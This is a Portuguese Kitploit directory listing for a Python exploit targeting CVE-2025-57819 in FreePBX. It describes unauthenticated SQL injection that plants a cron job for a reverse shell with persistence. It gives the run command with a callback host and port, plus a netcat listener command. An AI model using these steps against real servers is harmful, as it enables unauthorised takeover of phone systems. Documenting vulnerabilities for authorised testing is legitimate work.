Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-57819-exploit — Exploit em Python para CVE-2025-57819 direcionado ao FreePBX via injeção SQL não autenticada para obter execução remota de código com shell reverso automático e persistência baseada em cron. | Kitploit
Ferramentas/GitHubGitHub/its1zero/cve-2025-57819-exploit
Mecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubits1zero/cve-2025-57819-exploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

cve-2025-57819-exploit

Exploit em Python para CVE-2025-57819 direcionado ao FreePBX via injeção SQL não autenticada para obter execução remota de código com shell reverso automático e persistência baseada em cron.

Ver Repositório
há 1 mêsAinda não revisado

Exploit CVE-2025-57819

Metadados

  • Severidade: Crítica (9.8)
  • Vetor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Tipo: Injeção de SQL não autenticada → Execução Remota de Código
  • Software Afetado: FreePBX (módulo endpoint) < 15.0.66, < 16.0.89 e < 17.0.3
  • Testado em: FreePBX 16.0.40.7 no CentOS 7 com Apache 2.4

Visão Geral

Este script explora CVE-2025-57819 em um módulo endpoint vulnerável do FreePBX. A vulnerabilidade permite injeção de SQL, que é usada para injetar cron jobs maliciosos.

Não há nenhum passo adicional necessário, como em outros exploits públicos que interagem com o alvo através de uma webshell enviada. É uma abordagem direta que lhe trará acesso direto a um reverse shell.

Impacto

A execução remota de código é alcançada através de injeção de SQL e manipulação de cron jobs. A exploração bem-sucedida resulta em um reverse shell no sistema alvo. Dependendo da configuração, isso pode levar ao comprometimento total do sistema.

Funcionalidades

  • Injeção de SQL via endpoint AJAX vulnerável
  • Geração automática de payload de reverse shell
  • Persistência via cron job executado a cada minuto (* * * * *)
  • Limpeza automática do cron job injetado
  • Usa payloads codificados em hex, já que payloads em base64 são corrompidos quando caracteres + são interpretados como espaços.

Uso

Execute o exploit fornecendo a configuração do alvo e do listener:

root@kitploit:~
python3 cve-2025-57819.py <target> <lhost> <lport>

Parâmetros

  • <target>: Hostname ou endereço IP do alvo (instância vulnerável do FreePBX)
  • <lhost>: Endereço IP do atacante para callback do reverse shell
  • <lport>: Porta de escuta para a conexão de entrada

Exemplo:

root@kitploit:~
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999

Configuração do Listener

Inicie um listener antes de executar o exploit:

root@kitploit:~
nc -lvnp <port>

Exemplo:

root@kitploit:~
nc -nlvp 9999

Aviso Legal

Esta ferramenta destina-se apenas a fins educacionais e testes de segurança autorizados. O uso não autorizado contra sistemas sem permissão explícita é ilegal. O autor não assume responsabilidade por uso indevido ou danos causados por esta ferramenta.

Autor

Its1Zero - [email protected]

Referências

  • https://nvd.nist.gov/vuln/detail/cve-2025-57819
  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
  • https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
Baixar ferramenta